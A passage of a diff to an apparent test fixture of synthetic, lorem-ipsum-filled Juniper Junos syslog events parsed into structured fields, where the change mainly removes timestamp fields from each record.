"2020-07-04T13:38:16.000Z", "event.action": "aper", "event.code": "NASD_PPP_SEND_PARTIAL", "event.dataset": "juniper.junos", @@ -328,7 +305,6 @@ "rsa.misc.event_type": "aper", "rsa.misc.result_code": "santiumd", "rsa.time.day": "4", - "rsa.time.event_time": "2020-07-04T13:38:16.000Z", "rsa.time.month": "Jul", "service.type": "juniper", "tags": [ @@ -337,7 +313,6 @@ ] }, { - "@timestamp": "2020-07-18T20:40:50.000Z", "event.action": "temqu", "event.code": "UI_COMMIT_AT_FAILED", "event.dataset": "juniper.junos", @@ -357,7 +332,6 @@ "rsa.misc.event_type": "temqu", "rsa.misc.result": "success", "rsa.time.day": "18", - "rsa.time.event_time": "2020-07-18T20:40:50.000Z", "rsa.time.month": "Jul", "service.type": "juniper", "tags": [ @@ -366,7 +340,6 @@ ] }, { - "@timestamp": "2020-08-02T03:43:25.000Z", "event.action": "BOOTPD_NEW_CONF:", "event.code": "BOOTPD_NEW_CONF", "event.dataset": "juniper.junos", @@ -384,7 +357,6 @@ "rsa.internal.messageid": "BOOTPD_NEW_CONF", "rsa.misc.event_type": "BOOTPD_NEW_CONF:", "rsa.time.day": "2", - "rsa.time.event_time": "2020-08-02T03:43:25.000Z", "rsa.time.month": "Aug", "service.type": "juniper", "tags": [ @@ -393,7 +365,6 @@ ] }, { - "@timestamp": "2020-08-16T10:45:59.000Z", "event.action": "onemulla", "event.code": "RPD_RIP_JOIN_MULTICAST", "event.dataset": "juniper.junos", @@ -414,7 +385,6 @@ "rsa.misc.result": "unknown", "rsa.network.interface": "enp0s4292", "rsa.time.day": "16", - "rsa.time.event_time": "2020-08-16T10:45:59.000Z", "rsa.time.month": "Aug", "service.type": "juniper", "tags": [ @@ -423,7 +393,6 @@ ] }, { - "@timestamp": "2020-08-30T17:48:33.000Z", "event.action": "xea", "event.code": "FSAD_TERMINATED_CONNECTION", "event.dataset": "juniper.junos", @@ -443,7 +412,6 @@ "rsa.misc.event_type": "xea", "rsa.misc.result": "unknown", "rsa.time.day": "30", - "rsa.time.event_time": "2020-08-30T17:48:33.000Z", "rsa.time.month": "Aug", "service.type": "juniper", "tags": [ @@ -452,7 +420,6 @@ ] }, { - "@timestamp": "2020-09-14T00:51:07.000Z", "event.action": "eri", "event.code": "RPD_KRT_IFL_GENERATION", "event.dataset": "juniper.junos", @@ -473,7 +440,6 @@ "rsa.misc.result": "unknown", "rsa.network.interface": "lo2169", "rsa.time.day": "13", - "rsa.time.event_time": "2020-09-14T00:51:07.000Z", "rsa.time.month": "Sep", "service.type": "juniper", "tags": [ @@ -482,7 +448,6 @@ ] }, { - "@timestamp": "2020-09-28T07:53:42.000Z", "event.code": "[3453]", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -495,7 +460,6 @@ "observer.vendor": "Juniper", "rsa.internal.messageid": "[3453]", "rsa.time.day": "28", - "rsa.time.event_time": "2020-09-28T07:53:42.000Z", "rsa.time.month": "Sep", "service.type": "juniper", "tags": [ @@ -504,7 +468,6 @@ ] }, { - "@timestamp": "2020-10-12T14:56:16.000Z", "event.action": "RMOPD_usage", "event.code": "RMOPD_usage", "event.dataset": "juniper.junos", @@ -525,7 +488,6 @@ "rsa.misc.pid": "3993", "rsa.misc.result": "failure", "rsa.time.day": "12", - "rsa.time.event_time": "2020-10-12T14:56:16.000Z", "rsa.time.month": "Oct", "service.type": "juniper", "tags": [ @@ -534,7 +496,6 @@ ] }, { - "@timestamp": "2020-10-26T21:58:50.000Z", "event.action": "RPD_ISIS_LSPCKSUM:", "event.code": "tasun", "event.dataset": "juniper.junos", @@ -559,7 +520,6 @@ "rsa.misc.result_code": "eratv", "rsa.network.interface": "enp0s1965", "rsa.time.day": "26", - "rsa.time.event_time": "2020-10-26T21:58:50.000Z", "rsa.time.month": "Oct", "service.type": "juniper", "tags": [ @@ -568,7 +528,6 @@ ] }, { - "@timestamp": "2020-11-10T05:01:24.000Z", "event.action": "VPN", "event.code": "kmd", "event.dataset": "juniper.junos", @@ -583,7 +542,6 @@ "rsa.internal.messageid": "kmd", "rsa.misc.event_type": "VPN", "rsa.time.day": "10", - "rsa.time.event_time": "2020-11-10T05:01:24.000Z", "rsa.time.month": "Nov", "service.type": "juniper", "tags": [ @@ -592,7 +550,6 @@ ] }, { - "@timestamp": "2020-11-24T12:03:59.000Z", "destination.address": "erspi4926.www5.test", "event.action": "LOGIN_FAILED:", "event.code": "LOGIN_FAILED", @@ -624,7 +581,6 @@ "rsa.misc.pid": "6463", "rsa.network.host_dst": "erspi4926.www5.test", "rsa.time.day": "24", - "rsa.time.event_time": "2020-11-24T12:03:59.000Z", "rsa.time.month": "Nov", "service.type": "juniper", "tags": [ @@ -634,7 +590,6 @@ "user.name": "atq" }, { - "@timestamp": "2020-12-08T19:06:33.000Z", "event.action": "iadese", "event.code": "CHASSISD_MBUS_ERROR", "event.dataset": "juniper.junos", @@ -653,7 +608,6 @@ "rsa.misc.event_type": "iadese", "rsa.misc.result_code": "imad", "rsa.time.day": "8", - "rsa.time.event_time": "2020-12-08T19:06:33.000Z", "rsa.time.month": "Dec", "service.name": "nisiu", "service.type": "juniper", @@ -663,7 +617,6 @@ ] }, { - "@timestamp": "2019-12-23T02:09:07.000Z", "event.action": "TFTPD_NAK_ERR", "event.code": "TFTPD_NAK_ERR", "event.dataset": "juniper.junos", @@ -684,7 +637,6 @@ "rsa.misc.pid": "1471", "rsa.misc.result_code": "ptatems", "rsa.time.day": "23", - "rsa.time.event_time": "2019-12-23T02:09:07.000Z", "rsa.time.month": "Dec", "service.type": "juniper", "tags": [ @@ -693,7 +645,6 @@ ] }, { - "@timestamp": "2020-01-06T09:11:41.000Z", "event.action": "atqu", "event.code": "UI_DUPLICATE_UID", "event.dataset": "juniper.junos", @@ -708,14 +659,13 @@ "process.name": "UI_DUPLICATE_UID: restart", "process.pid": 3350, "related.user": [ - "olorsita", - "naturau" + "naturau", + "olorsita" ], "rsa.internal.event_desc": "Users have the same UID", "rsa.internal.messageid": "UI_DUPLICATE_UID", "rsa.misc.event_type": "atqu", "rsa.time.day": "6", - "rsa.time.event_time": "2020-01-06T09:11:41.000Z", "rsa.time.month": "Jan", "service.type": "juniper", "tags": [ @@ -725,7 +675,6 @@ "user.name": "naturau" }, { - "@timestamp": "2020-01-20T16:14:16.000Z", "event.action": "TFTPD_CREATE_ERR:", "event.code": "TFTPD_CREATE_ERR", "event.dataset": "juniper.junos", @@ -745,7 +694,6 @@ "rsa.misc.pid": "4753", "rsa.misc.result": "unknown", "rsa.time.day": "20", - "rsa.time.event_time": "2020-01-20T16:14:16.000Z", "rsa.time.month": "Jan", "service.type": "juniper", "tags": [ @@ -754,7 +702,6 @@ ] }, { - "@timestamp": "2020-02-03T23:16:50.000Z", "event.code": "[1269]", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -767,7 +714,6 @@ "observer.vendor": "Juniper", "rsa.internal.messageid": "[1269]", "rsa.time.day": "3", - "rsa.time.event_time": "2020-02-03T23:16:50.000Z", "rsa.time.month": "Feb", "service.type": "juniper", "tags": [ @@ -776,7 +722,6 @@ ] }, { - "@timestamp": "2020-02-18T06:19:24.000Z", "event.dataset": "juniper.junos", "event.module": "juniper", "event.original": "Feb 18 04:19:24 fpc2 COSMAN: : uptasnul: delete class_to_ifl table 2069, ifl 3693", @@ -787,7 +732,6 @@ "observer.type": "Routers", "observer.vendor": "Juniper", "rsa.time.day": "18", - "rsa.time.event_time": "2020-02-18T06:19:24.000Z", "rsa.time.month": "Feb", "service.type": "juniper", "tags": [ @@ -796,7 +740,6 @@ ] }, { - "@timestamp": "2020-03-04T13:21:59.000Z", "event.action": "SNMPD_TRAP_QUEUE_MAX_ATTEMPTS", "event.code": "SNMPD_TRAP_QUEUE_MAX_ATTEMPTS", "event.dataset": "juniper.junos", @@ -818,7 +761,6 @@ "rsa.misc.event_type": "SNMPD_TRAP_QUEUE_MAX_ATTEMPTS", "rsa.misc.obj_name": "exercita", "rsa.time.day": "4", - "rsa.time.event_time": "2020-03-04T13:21:59.000Z", "rsa.time.month": "Mar", "service.type": "juniper", "tags": [ @@ -827,7 +769,6 @@ ] }, { - "@timestamp": "2020-03-18T20:24:33.000Z", "event.action": "ntut", "event.code": "TFTPD_BIND_ERR", "event.dataset": "juniper.junos", @@ -846,7 +787,6 @@ "rsa.misc.event_type": "ntut", "rsa.misc.result": "failure", "rsa.time.day": "18", - "rsa.time.event_time": "2020-03-18T20:24:33.000Z", "rsa.time.month": "Mar", "service.type": "juniper", "tags": [ @@ -855,7 +795,6 @@ ] }, { - "@timestamp": "2020-04-02T03:27:07.000Z", "destination.ip": [ "10.88.126.165" ], @@ -880,7 +819,6 @@ "rsa.misc.event_type": "RPD_LDP_SESSIONDOWN:", "rsa.misc.result": "failure", "rsa.time.day": "2", - "rsa.time.event_time": "2020-04-02T03:27:07.000Z", "rsa.time.month": "Apr", "service.type": "juniper", "tags": [ @@ -889,7 +827,6 @@ ] }, { - "@timestamp": "2020-04-16T10:29:41.000Z", "event.code": "[180]", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -902,7 +839,6 @@ "observer.vendor": "Juniper", "rsa.internal.messageid": "[180]", "rsa.time.day": "16", - "rsa.time.event_time": "2020-04-16T10:29:41.000Z", "rsa.time.month": "Apr", "service.type": "juniper", "tags": [ @@ -911,7 +847,6 @@ ] }, { - "@timestamp": "2020-04-30T17:32:16.000Z", "event.action": "iumdo", "event.code": "NASD_CHAP_INVALID_CHAP_IDENTIFIER", "event.dataset": "juniper.junos", @@ -933,7 +868,6 @@ "rsa.misc.result_code": "ectetura", "rsa.network.interface": "lo2721", "rsa.time.day": "30", - "rsa.time.event_time": "2020-04-30T17:32:16.000Z", "rsa.time.month": "Apr", "service.type": "juniper", "tags": [ @@ -942,7 +876,6 @@ ] }, { - "@timestamp": "2020-05-15T00:34:50.000Z", "event.action": "allow", "event.code": "UI_LOAD_EVENT", "event.dataset": "juniper.junos", @@ -966,7 +899,6 @@ ], "rsa.misc.event_type": "seq", "rsa.time.day": "14", - "rsa.time.event_time": "2020-05-15T00:34:50.000Z", "rsa.time.month": "May", "service.type": "juniper", "tags": [ @@ -976,7 +908,6 @@ "user.name": "moll" }, { - "@timestamp": "2020-05-29T07:37:24.000Z", "event.action": "SNMP_TRAP_TRACE_ROUTE_TEST_FAILED", "event.code": "SNMP_TRAP_TRACE_ROUTE_TEST_FAILED", "event.dataset": "juniper.junos", @@ -997,7 +928,6 @@ "rsa.misc.obj_name": "edic", "rsa.misc.pid": "4053", "rsa.time.day": "29", - "rsa.time.event_time": "2020-05-29T07:37:24.000Z", "rsa.time.month": "May", "service.type": "juniper", "tags": [ @@ -1006,7 +936,6 @@ ] }, { - "@timestamp": "2020-06-12T14:39:58.000Z", "event.action": "uae", "event.code": "SNMPD_RTSLIB_ASYNC_EVENT", "event.dataset": "juniper.junos", @@ -1026,7 +955,6 @@ "rsa.misc.event_type": "uae", "rsa.misc.result": "failure", "rsa.time.day": "12", - "rsa.time.event_time": "2020-06-12T14:39:58.000Z", "rsa.time.month": "Jun", "service.type": "juniper", "tags": [ @@ -1035,7 +963,6 @@ ] }, { - "@timestamp": "2020-06-26T21:42:33.000Z", "event.action": "BOOTPD_TIMEOUT:", "event.code": "BOOTPD_TIMEOUT", "event.dataset": "juniper.junos", @@ -1054,7 +981,6 @@ "rsa.misc.event_type": "BOOTPD_TIMEOUT:", "rsa.misc.result": "success", "rsa.time.day": "26", - "rsa.time.event_time": "2020-06-26T21:42:33.000Z", "rsa.time.month": "Jun", "service.type": "juniper", "tags": [ @@ -1063,7 +989,6 @@ ] }, { - "@timestamp": "2020-07-11T04:45:07.000Z", "event.action": "abore", "event.code": "NASD_RADIUS_MESSAGE_UNEXPECTED", "event.dataset": "juniper.junos", @@ -1082,7 +1007,6 @@ "rsa.misc.event_type": "abore", "rsa.misc.result": "unknown", "rsa.time.day": "11", - "rsa.time.event_time": "2020-07-11T04:45:07.000Z", "rsa.time.month": "Jul", "service.type": "juniper", "tags": [ @@ -1091,7 +1015,6 @@ ] }, { - "@timestamp": "2020-07-25T11:47:41.000Z", "event.action": "illum", "event.code": "PWC_LOCKFILE_BAD_FORMAT", "event.dataset": "juniper.junos", @@ -1110,7 +1033,6 @@ "rsa.misc.client": "eprehe", "rsa.misc.event_type": "illum", "rsa.time.day": "25", - "rsa.time.event_time": "2020-07-25T11:47:41.000Z", "rsa.time.month": "Jul", "service.type": "juniper", "tags": [ @@ -1119,7 +1041,6 @@ ] }, { - "@timestamp": "2020-08-08T18:50:15.000Z", "event.action": "RPD_KRT_AFUNSUPRT", "event.code": "RPD_KRT_AFUNSUPRT", "event.dataset": "juniper.junos", @@ -1141,7 +1062,6 @@ "rsa.misc.pid": "1613", "rsa.misc.result_code": "tec", "rsa.time.day": "8", - "rsa.time.event_time": "2020-08-08T18:50:15.000Z", "rsa.time.month": "Aug", "service.type": "juniper", "tags": [ @@ -1150,7 +1070,6 @@ ] }, { - "@timestamp": "2020-08-23T01:52:50.000Z", "event.action": "PWC_PROCESS_FORCED_HOLD", "event.code": "PWC_PROCESS_FORCED_HOLD", "event.dataset": "juniper.junos", @@ -1170,7 +1089,6 @@ "rsa.misc.event_type": "PWC_PROCESS_FORCED_HOLD", "rsa.misc.pid": "6086", "rsa.time.day": "22", - "rsa.time.event_time": "2020-08-23T01:52:50.000Z", "rsa.time.month": "Aug", "service.type": "juniper", "tags": [ @@ -1179,7 +1097,6 @@ ] }, { - "@timestamp": "2020-09-06T08:55:24.000Z", "event.action": "tiu", "event.code": "MIB2D_IFL_IFINDEX_FAILURE", "event.dataset": "juniper.junos", @@ -1202,7 +1119,6 @@ "rsa.misc.event_type": "tiu", "rsa.misc.result": "unknown", "rsa.time.day": "6", - "rsa.time.event_time": "2020-09-06T08:55:24.000Z", "rsa.time.month": "Sep", "service.type": "juniper", "tags": [ @@ -1212,7 +1128,6 @@ "user.name": "wri" }, { - "@timestamp": "2020-09-20T15:57:58.000Z", "event.action": "UI_DBASE_MISMATCH_MAJOR:", "event.code": "UI_DBASE_MISMATCH_MAJOR", "event.dataset": "juniper.junos", @@ -1233,7 +1148,6 @@ "rsa.internal.messageid": "UI_DBASE_MISMATCH_MAJOR", "rsa.misc.event_type": "UI_DBASE_MISMATCH_MAJOR:", "rsa.time.day": "20", - "rsa.time.event_time": "2020-09-20T15:57:58.000Z", "rsa.time.month": "Sep", "service.type": "juniper", "tags": [ @@ -1242,7 +1156,6 @@ ] }, { - "@timestamp": "2020-10-04T23:00:32.000Z", "event.action": "SNMPD_VIEW_INSTALL_DEFAULT", "event.code": "SNMPD_VIEW_INSTALL_DEFAULT", "event.dataset": "juniper.junos", @@ -1263,7 +1176,6 @@ "rsa.misc.event_type": "SNMPD_VIEW_INSTALL_DEFAULT", "rsa.misc.result": "eetdo: success", "rsa.time.day": "4", - "rsa.time.event_time": "2020-10-04T23:00:32.000Z", "rsa.time.month": "Oct", "service.type": "juniper", "tags": [ @@ -1272,7 +1184,6 @@ ] }, { - "@timestamp": "2020-10-19T06:03:07.000Z", "event.action": "uptatem", "event.code": "DCD_PARSE_STATE_EMERGENCY", "event.dataset": "juniper.junos", @@ -1290,7 +1201,6 @@ "rsa.internal.messageid": "DCD_PARSE_STATE_EMERGENCY", "rsa.misc.event_type": "uptatem", "rsa.time.day": "19", - "rsa.time.event_time": "2020-10-19T06:03:07.000Z", "rsa.time.month": "Oct", "service.type": "juniper", "tags": [ @@ -1299,7 +1209,6 @@ ] }, { - "@timestamp": "2020-11-02T13:05:41.000Z", "event.action": "LOGIN_PAM_MAX_RETRIES:", "event.code": "LOGIN_PAM_MAX_RETRIES", "event.dataset": "juniper.junos", @@ -1326,7 +1235,6 @@ "rsa.misc.event_type": "LOGIN_PAM_MAX_RETRIES:", "rsa.misc.result": "Too many retries while authenticating user", "rsa.time.day": "2", - "rsa.time.event_time": "2020-11-02T13:05:41.000Z", "rsa.time.month": "Nov", "service.type": "juniper", "tags": [ @@ -1336,7 +1244,6 @@ "user.name": "iquipex" }, { - "@timestamp": "2020-11-16T20:08:15.000Z", "event.action": "BOOTPD_NO_BOOTSTRING", "event.code": "BOOTPD_NO_BOOTSTRING", "event.dataset": "juniper.junos", @@ -1356,7 +1263,6 @@ "rsa.misc.event_type": "BOOTPD_NO_BOOTSTRING", "rsa.misc.pid": "3290", "rsa.time.day": "16", - "rsa.time.event_time": "2020-11-16T20:08:15.000Z", "rsa.time.month": "Nov", "service.type": "juniper", "tags": [ @@ -1365,7 +1271,6 @@ ] }, { - "@timestamp": "2020-12-01T03:10:49.000Z", "event.code": "sshd", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -1390,7 +1295,6 @@ "rsa.investigations.ec_outcome": "Failure", "rsa.investigations.ec_theme": "Authentication", "rsa.time.day": "1", - "rsa.time.event_time": "2020-12-01T03:10:49.000Z", "rsa.time.month": "Dec", "service.type": "juniper", "tags": [ @@ -1400,7 +1304,6 @@ "user.name": "ciatisun" }, { - "@timestamp": "2020-12-15T10:13:24.000Z", "event.code": "COS", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -1416,7 +1319,6 @@ "rsa.internal.event_desc": "Received FC Q map", "rsa.internal.messageid": "COS", "rsa.time.day": "15", - "rsa.time.event_time": "2020-12-15T10:13:24.000Z", "rsa.time.month": "Dec", "service.type": "juniper", "tags": [ @@ -1425,7 +1327,6 @@ ] }, { - "@timestamp": "2019-12-29T17:15:58.000Z", "event.action": "nvolupta", "event.code": "cgatool", "event.dataset": "juniper.junos", @@ -1443,7 +1344,6 @@ "rsa.misc.event_type": "nvolupta", "rsa.misc.result": "success", "rsa.time.day": "29", - "rsa.time.event_time": "2019-12-29T17:15:58.000Z", "rsa.time.month": "Dec", "service.type": "juniper", "tags": [ @@ -1452,7 +1352,6 @@ ] }, { - "@timestamp": "2020-01-13T00:18:32.000Z", "event.action": "idolor", "event.code": "CHASSISD_SNMP_TRAP6", "event.dataset": "juniper.junos", @@ -1472,7 +1371,6 @@ "rsa.misc.event_type": "idolor", "rsa.misc.result": "success", "rsa.time.day": "12", - "rsa.time.event_time": "2020-01-13T00:18:32.000Z", "rsa.time.month": "Jan", "service.type": "juniper", "tags": [ @@ -1481,7 +1379,6 @@ ] }, { - "@timestamp": "2020-01-27T07:21:06.000Z", "event.dataset": "juniper.junos", "event.module": "juniper", "event.original": "Jan 27 05:21:06 ssb FLOW_REASSEMBLE_SUCCEED: : Packet merged source 10.102.228.136 destination 10.151.136.250 ipid upt succeed", @@ -1492,7 +1389,6 @@ "observer.type": "Routers", "observer.vendor": "Juniper", "rsa.time.day": "27", - "rsa.time.event_time": "2020-01-27T07:21:06.000Z", "rsa.time.month": "Jan", "service.type": "juniper", "tags": [ @@ -1501,7 +1397,6 @@ ] }, { - "@timestamp": "2020-02-10T14:23:41.000Z", "event.action": "serrorsi", "event.code": "DFWD_PARSE_FILTER_EMERGENCY", "event.dataset": "juniper.junos", @@ -1519,7 +1414,6 @@ "rsa.internal.messageid": "DFWD_PARSE_FILTER_EMERGENCY", "rsa.misc.event_type": "serrorsi", "rsa.time.day": "10", - "rsa.time.event_time": "2020-02-10T14:23:41.000Z", "rsa.time.month": "Feb", "service.name": "tsedquia", "service.type": "juniper", @@ -1529,7 +1423,6 @@ ] }, { - "@timestamp": "2020-02-24T21:26:15.000Z", "destination.ip": [ "10.148.255.126" ], @@ -1554,7 +1447,6 @@ "rsa.misc.event_type": "RPD_LDP_SESSIONDOWN:", "rsa.misc.result": "unknown", "rsa.time.day": "24", - "rsa.time.event_time": "2020-02-24T21:26:15.000Z", "rsa.time.month": "Feb", "service.type": "juniper", "tags": [ @@ -1563,7 +1455,6 @@ ] }, { - "@timestamp": "2020-03-11T04:28:49.000Z", "event.code": "[mipsumqu]", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -1576,7 +1467,6 @@ "observer.vendor": "Juniper", "rsa.internal.messageid": "[mipsumqu]", "rsa.time.day": "11", - "rsa.time.event_time": "2020-03-11T04:28:49.000Z", "rsa.time.month": "Mar", "service.type": "juniper", "tags": [ @@ -1585,7 +1475,6 @@ ] }, { - "@timestamp": "2020-03-25T11:31:24.000Z", "event.code": "lsys_ssam_handler", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -1602,7 +1491,6 @@ "rsa.internal.messageid": "lsys_ssam_handler", "rsa.misc.node": "mquis", "rsa.time.day": "25", - "rsa.time.event_time": "2020-03-25T11:31:24.000Z", "rsa.time.month": "Mar", "service.type": "juniper", "tags": [ @@ -1611,7 +1499,6 @@ ] }, { - "@timestamp": "2020-04-08T18:33:58.000Z", "event.action": "loreeuf", "event.code": "UI_LOST_CONN", "event.dataset": "juniper.junos", @@ -1630,7 +1517,6 @@ "rsa.misc.client": "orainci", "rsa.misc.event_type": "loreeuf", "rsa.time.day": "8", - "rsa.time.event_time": "2020-04-08T18:33:58.000Z", "rsa.time.month": "Apr", "service.type": "juniper", "tags": [ @@ -1639,7 +1525,6 @@ ] }, { - "@timestamp": "2020-04-23T01:36:32.000Z", "event.action": "itse", "event.code": "PWC_PROCESS_HOLD", "event.dataset": "juniper.junos", @@ -1658,7 +1543,6 @@ "rsa.misc.client": "lapari", "rsa.misc.event_type": "itse", "rsa.time.day": "22", - "rsa.time.event_time": "2020-04-23T01:36:32.000Z", "rsa.time.month": "Apr", "service.type": "juniper", "tags": [ @@ -1667,7 +1551,6 @@ ] }, { - "@timestamp": "2020-05-07T08:39:06.000Z", "event.action": "LIBSERVICED_SOCKET_BIND", "event.code": "LIBSERVICED_SOCKET_BIND", "event.dataset": "juniper.junos", @@ -1687,7 +1570,6 @@ "rsa.misc.result": "failure", "rsa.misc.result_code": ": dantium", "rsa.time.day": "7", - "rsa.time.event_time": "2020-05-07T08:39:06.000Z", "rsa.time.month": "May", "rsa.wireless.wlan_ssid": "ors", "service.type": "juniper", @@ -1697,7 +1579,6 @@ ] }, { - "@timestamp": "2020-05-21T15:41:41.000Z", "destination.address": "mSect5899.domain", "event.action": "LOGIN_FAILED:", "event.code": "LOGIN_FAILED", @@ -1728,7 +1609,6 @@ "rsa.misc.event_type": "LOGIN_FAILED:", "rsa.network.host_dst": "mSect5899.domain", "rsa.time.day": "21", - "rsa.time.event_time": "2020-05-21T15:41:41.000Z", "rsa.time.month": "May", "service.type": "juniper", "tags": [ @@ -1738,7 +1618,6 @@ "user.name": "olu" }, { - "@timestamp": "2020-06-04T22:44:15.000Z", "event.action": "MIB2D_IFL_IFINDEX_FAILURE:", "event.code": "MIB2D_IFL_IFINDEX_FAILURE", "event.dataset": "juniper.junos", @@ -1762,7 +1641,6 @@ "rsa.misc.pid": "6535", "rsa.misc.result": "unknown", "rsa.time.day": "4", - "rsa.time.event_time": "2020-06-04T22:44:15.000Z", "rsa.time.month": "Jun", "service.type": "juniper", "tags": [ @@ -1772,7 +1650,6 @@ "user.name": "deseru" }, { - "@timestamp": "2020-06-19T05:46:49.000Z", "event.action": "CHASSISD_RELEASE_MASTERSHIP:", "event.code": "CHASSISD_RELEASE_MASTERSHIP", "event.dataset": "juniper.junos", @@ -1791,7 +1668,6 @@ "rsa.misc.event_type": "CHASSISD_RELEASE_MASTERSHIP:", "rsa.misc.pid": "5276", "rsa.time.day": "19", - "rsa.time.event_time": "2020-06-19T05:46:49.000Z", "rsa.time.month": "Jun", "service.type": "juniper", "tags": [ @@ -1800,7 +1676,6 @@ ] }, { - "@timestamp": "2020-07-03T12:49:23.000Z", "event.code": "[3450]", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -1813,7 +1688,6 @@ "observer.vendor": "Juniper", "rsa.internal.messageid": "[3450]", "rsa.time.day": "3", - "rsa.time.event_time": "2020-07-03T12:49:23.000Z", "rsa.time.month": "Jul", "service.type": "juniper", "tags": [ @@ -1822,7 +1696,6 @@ ] }, { - "@timestamp": "2020-07-17T19:51:58.000Z", "event.action": "SERVICED_RTSOCK_SEQUENCE", "event.code": "SERVICED_RTSOCK_SEQUENCE", "event.dataset": "juniper.junos", @@ -1843,7 +1716,6 @@ "rsa.misc.pid": "226", "rsa.misc.result": "unknown", "rsa.time.day": "17", - "rsa.time.event_time": "2020-07-17T19:51:58.000Z", "rsa.time.month": "Jul", "service.type": "juniper", "tags": [ @@ -1852,7 +1724,6 @@ ] }, { - "@timestamp": "2020-08-01T02:54:32.000Z", "event.action": "VPN", "event.code": "idpinfo", "event.dataset": "juniper.junos", @@ -1868,7 +1739,6 @@ "rsa.misc.event_type": "VPN", "rsa.misc.pid": "940", "rsa.time.day": "1", - "rsa.time.event_time": "2020-08-01T02:54:32.000Z", "rsa.time.month": "Aug", "service.type": "juniper", "tags": [ @@ -1877,7 +1747,6 @@ ] }, { - "@timestamp": "2020-08-15T09:57:06.000Z", "event.action": "oreeufug", "event.code": "RPD_KRT_NOIFD", "event.dataset": "juniper.junos", @@ -1898,7 +1767,6 @@ "rsa.misc.event_type": "oreeufug", "rsa.network.interface": "lo4593", "rsa.time.day": "15", - "rsa.time.event_time": "2020-08-15T09:57:06.000Z", "rsa.time.month": "Aug", "service.type": "juniper", "tags": [ @@ -1907,7 +1775,6 @@ ] }, { - "@timestamp": "2020-08-29T16:59:40.000Z", "event.action": "craftd:", "event.code": "craftd", "event.dataset": "juniper.junos", @@ -1926,7 +1793,6 @@ "rsa.misc.event_type": "craftd:", "rsa.misc.result": "unknown", "rsa.time.day": "29", - "rsa.time.event_time": "2020-08-29T16:59:40.000Z", "rsa.time.month": "Aug", "service.type": "juniper", "tags": [ @@ -1935,7 +1801,6 @@ ] }, { - "@timestamp": "2020-09-13T00:02:15.000Z", "event.action": "eetd", "event.code": "ACCT_CU_RTSLIB_error", "event.dataset": "juniper.junos", @@ -1957,7 +1822,6 @@ "rsa.misc.result": "success", "rsa.network.interface": "enp0s2674", "rsa.time.day": "12", - "rsa.time.event_time": "2020-09-13T00:02:15.000Z", "rsa.time.month": "Sep", "service.type": "juniper", "tags": [ @@ -1966,7 +1830,6 @@ ] }, { - "@timestamp": "2020-09-27T07:04:49.000Z", "event.action": "VPN", "event.code": "kmd", "event.dataset": "juniper.junos", @@ -1981,7 +1844,6 @@ "rsa.internal.messageid": "kmd", "rsa.misc.event_type": "VPN", "rsa.time.day": "27", - "rsa.time.event_time": "2020-09-27T07:04:49.000Z", "rsa.time.month": "Sep", "service.type": "juniper", "tags": [ @@ -1990,7 +1852,6 @@ ] }, { - "@timestamp": "2020-10-11T14:07:23.000Z", "event.action": "rauto", "event.code": "LOGIN_PAM_NONLOCAL_USER", "event.dataset": "juniper.junos", @@ -2017,7 +1878,6 @@ "rsa.misc.event_type": "rauto", "rsa.misc.result": "User authenticated but has no local login ID", "rsa.time.day": "11", - "rsa.time.event_time": "2020-10-11T14:07:23.000Z", "rsa.time.month": "Oct", "service.type": "juniper", "tags": [ @@ -2027,7 +1887,6 @@ "user.name": "rese" }, { - "@timestamp": "2020-10-25T21:09:57.000Z", "event.action": "RPD_KRT_NOIFD", "event.code": "RPD_KRT_NOIFD", "event.dataset": "juniper.junos", @@ -2049,7 +1908,6 @@ "rsa.misc.pid": "6184", "rsa.network.interface": "enp0s7694", "rsa.time.day": "25", - "rsa.time.event_time": "2020-10-25T21:09:57.000Z", "rsa.time.month": "Oct", "service.type": "juniper", "tags": [ @@ -2058,7 +1916,6 @@ ] }, { - "@timestamp": "2020-11-09T04:12:32.000Z", "event.code": "uspinfo", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -2074,7 +1931,6 @@ "rsa.internal.event_desc": "flow_print_session_summary_output received", "rsa.internal.messageid": "uspinfo", "rsa.time.day": "9", - "rsa.time.event_time": "2020-11-09T04:12:32.000Z", "rsa.time.month": "Nov", "service.type": "juniper", "tags": [ @@ -2083,7 +1939,6 @@ ] }, { - "@timestamp": "2020-11-23T11:15:06.000Z", "event.action": "mfugi", "event.code": "RPD_TASK_REINIT", "event.dataset": "juniper.junos", @@ -2101,7 +1956,6 @@ "rsa.internal.messageid": "RPD_TASK_REINIT", "rsa.misc.event_type": "mfugi", "rsa.time.day": "23", - "rsa.time.event_time": "2020-11-23T11:15:06.000Z", "rsa.time.month": "Nov", "service.type": "juniper", "tags": [ @@ -2110,7 +1964,6 @@ ] }, { - "@timestamp": "2020-12-07T18:17:40.000Z", "event.action": "allow", "event.code": "ECCD_TRACE_FILE_OPEN_FAILED", "event.dataset": "juniper.junos", @@ -2133,7 +1986,6 @@ "rsa.misc.pid": "2509", "rsa.misc.result": "failure", "rsa.time.day": "7", - "rsa.time.event_time": "2020-12-07T18:17:40.000Z", "rsa.time.month": "Dec", "service.type": "juniper", "tags": [ @@ -2142,7 +1994,6 @@ ] }, { - "@timestamp": "2019-12-22T01:20:14.000Z", "event.action": "accept", "event.code": "ECCD_TRACE_FILE_OPEN_FAILED", "event.dataset": "juniper.junos", @@ -2164,7 +2015,6 @@ "rsa.misc.event_type": "rudexer", "rsa.misc.result": "unknown", "rsa.time.day": "21", - "rsa.time.event_time": "2019-12-22T01:20:14.000Z", "rsa.time.month": "Dec", "service.type": "juniper", "tags": [ @@ -2173,7 +2023,6 @@ ] }, { - "@timestamp": "2020-01-05T08:22:49.000Z", "destination.address": "tod6376.mail.host", "event.action": "LOGIN_FAILED:", "event.code": "LOGIN_FAILED", @@ -2204,7 +2053,6 @@ "rsa.misc.event_type": "LOGIN_FAILED:", "rsa.network.host_dst": "tod6376.mail.host", "rsa.time.day": "5", - "rsa.time.event_time": "2020-01-05T08:22:49.000Z", "rsa.time.month": "Jan", "service.type": "juniper", "tags": [ @@ -2214,7 +2062,6 @@ "user.name": "turQ" }, { - "@timestamp": "2020-01-19T15:25:23.000Z", "event.action": "FSAD_CONNTIMEDOUT", "event.code": "FSAD_CONNTIMEDOUT", 